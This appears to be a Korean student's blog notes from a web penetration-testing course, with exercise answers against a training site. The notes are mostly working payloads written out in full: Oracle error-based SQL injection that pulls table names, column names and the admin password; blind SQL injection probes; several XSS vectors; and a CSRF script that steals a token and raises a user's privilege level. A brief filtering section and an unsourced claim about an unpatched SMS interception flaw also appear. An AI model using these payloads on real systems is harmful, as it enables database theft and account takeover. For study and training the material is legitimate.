---
layout : post
title : 웹 모의해킹
---

SK -> AT&T SMS 보낼때 국가간 Protocol 변환시 인증정보 확인안함

도감청 가능, 가로채기해서 내가 받기도 가능. 여태 패치 안됨.

Spring, Samba, BlueBorne





보고서 - 개요, 문제풀이



SQL Injection

> Union
>
> Error Based
>
> Blind





select num, dong, juso from post where dong like %'p-dong'%

union select id, pw, name from member

oracle : all_tables, all_tab_columns(table_name, column_name)

영등포%', order by 4'

1. 컬럼개수 3
2. 컬럼타입
3. 테이블명
4. 컬럼명





Burpsuit 



pentest monkey

sql 명령어들



sql fiddle	



burp에서 % 인코딩을 해야되는지 안해도되는지 확인

암호화 하기전 salt를 더함



union

select rownum, table_name from user_tables where row = 2는 rownum이 가상이라 1을 지우고 다시 1부터 붙어영원히 2에 도달하지않음

select table_name from (select rownum as rnum, table_name from user_tables) where rnum = 2

count 10



errorbased

각 sql별 친절한 에러메세지를 주는 function이 있음

찾아서 넣자



ctxsys.drithsx.sn(user,(select user from dual where rownum=1))=1--

김세용' and ctxsys.drithsx.sn(1,(select user from dual where rownum=1)) = 1 --

### ordsys.ord_dicom.getmappingxpath()

김세용' and ordsys.ord_dicom.getmappingxpath((select user from dual)) = 1 --

김세용' and dbms_aw_xml.readawmetadata((select user from dual)) = 1 --

김세용' and ordsys.ord_dicom.getmappingxpath((select table_name from (select rownum as rnum, table_name from user_tables) where  rnum=1))=1--

**dbms_aw_xml.readawmetadata()**

김세용' and dbms_aw_xml.readawmetadata((select table_name from (select rownum as rnum, table_name from user_tables) where  rnum=1),null) is null--



테이블명 찾기

김세용' AND CTXSYS.DRITHSX.SN(user, (select table_name from (select rownum as rnum, table_name from user_tables) where  rnum=1))=1--



컬럼명 찾기

김세용' AND CTXSYS.DRITHSX.SN(user, (select column_name from (select rownum as rnum, column_name from user_tab_columns where table_name='LHSMEMBER3') where  rnum=1))=1--



데이터 찾기 - id

김세용' AND CTXSYS.DRITHSX.SN(user, (select id from (select rownum as rnum, id, pw from LHSMEMBER3) where  rnum=1))=1--



데이터 찾기 - pw

김세용' AND CTXSYS.DRITHSX.SN(user, (select pw from (select rownum as rnum, id, pw from LHSMEMBER3 where id='admin') where  rnum=1))=1--









### Blind SQL Injection

select zipcode, dong, addr from lhspost where dong like %[_________%' and (_________)' and 1=1--]%'

문정2%1' and ascii(substr((select table_name from (select rownum as rnum, table_name from user_tables) where rnum = 1), 1, 1)) = 75--









1. BSQL이 되는 정황증거를 개인카톡으로 제출하시오.

1.1. 전체 파라미터 제출

: id=admin&pw=1234

1.2. 서버측 로직 제출

: 왜 1.1이 실행되는지 소스코드(대략적인, 문법이 틀려도 됨)와 설명





1.1 전체 파라미터

id=1&pw=1 -> 로그인 성공

id=1' and 1=1--&pw=1 -> 로그인 성공

id=1' and 1=2--&pw=1 -> 로그인 실패



id=1' and ascii(substr((select table_name from (select rownum as rnum, table_name from user_tables) where rnum = 1), 1, 1)) = 76--&pw=1

이런식으로 id 부분에 Injection 가능합니다.



1.2. 서버측 로직 제출

select passwd from lhsmember3 where id = id입력값

if(passwd == 비밀번호입력값)

	로그인성공

else

	로그인 실패



이렇게 아이디에 해당하는 비밀번호만 가져와서

입력한 비밀번호와 비교하는 것 같습니다.



2번



1.

id=1') and 1=1--&pw=1 -> 로그인 성공

id=1') and 1=2--&pw=1 -> 로그인 실패

2.

select pw from from lhsmember3 where id='1'and ('1'='1') 



1.

id=1') and ('1'='1&pw=1 -> 로그인 성공

id=1') and ('1'='2&pw=2 -> 로그인 실패



select pw from lhsmember3 where (id='ID입력값')

select pw from lhsmember3 where (id=' 1' and '1'='1 ')



1.

sDate=20150102&eDate=20161231') and 1=1-- -> 게시글 잘 나옴

sDate=20150102&eDate=20161231') and 1=2-- -> 게시물 없음

select * from board where (date > 'sDate' and date < 'eDate')





select * from lhsboard where date between to_date('sDate', 'YYYYMMDD') and to_date('eDate', 'YYYYMMDD')

select * from lhsboard where date > to_date('sDate', 'YYYYMMDD') and date < to_date('eDate', 'YYYYMMDD')



1%') and ascii(substr((select table_name from (select rownum as rnum, table_name from user_tables) where rnum = 1), 1, 1)) = 75--



Select * from board where ('check1' like '%searchtext%') order by asc

parameter1 : select/*

parameter2 : */from



### XSS

\<input name="test" type="text" value="asdf">

입력:	asdf">\<script>alert("1")\</script><"

<!-- alsfdjksdkljlakejfklwaflkaj asdf asfkdljsdlkfj-->

입력: asdf-->\<script>xss\</script><!--



\<img src="X" onerror='alert(xss)'>





### 보안대책

- 어디서 : 입력값 > 출력값(이미 악성코드가 저장되어 있는경우 패치시에만)
- 무엇을 : 꺽쇠, 따옴표, onerror, onmouseover등의 직접 javascript 들어가는 파라메터
- 어떻게 : 근본적인 해결책

특수문자를 막는다.

<,>,(,),',"

< -> &\lt;

\> -> &\gt;"

--------------------------

다막고 Whitelist Filter

&\lt;p&\gt; -> \<p>

Blacklist Filter

"Onerror" -> "x-onerror" 

지워버리면 on**onerror**error 이렇게 하면 지워져도 다시 우회됨

"onmouseover" ->





input 이용
asdf"><script>alert('seyong');</script>

주석 이용
asdf--><script>alert('seyong');</script><!--

var test 이용
11;}alert("xss");funtion test2(){var a=1

pagename 이용
http://shanky.iptime.org:38080/lhs/join/checkPost2.jsp?pagename=asdf"><script>alert('seyong');</script><"&dong=11





q1.
<script>alert('xss');</script>

q2.
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

q3.
http://shanky.iptime.org:38080/lhs/quiz2/q3/#'a'%3E%3Cscript%3Ealert('xss');%3C/script%3E

q4.
100');alert('xss 

q5.
http://shanky.iptime.org:38080/lhs/quiz2/q5/signup.jsp?next=javascript:alert(%27xss%27) 

q6.
http://shanky.iptime.org:38080/lhs/quiz2/q6/#data:text/javascript,alert('xss')







**CSRF**

get/post

referer

확인창

필터링

token

captcha





<iframe id='subwin' src="http://shanky.iptime.org:38080/lhs/admshanks/levelup.jsp" width='0' height='0' onload="fLoad()">
</iframe>
<script>
function fLoad() {
var wSub = document.getElementById('subwin');
var iTok = wSub.contentWindow.document.getElementsByName("csrf_token")[0];
var tok = iTok.value;
wSub.src = "http://shanky.iptime.org:38080/lhs/admshanks/levelupProcess.jsp?rid=seyong&csrf_token=" + tok + "&levels=10";
}
</script>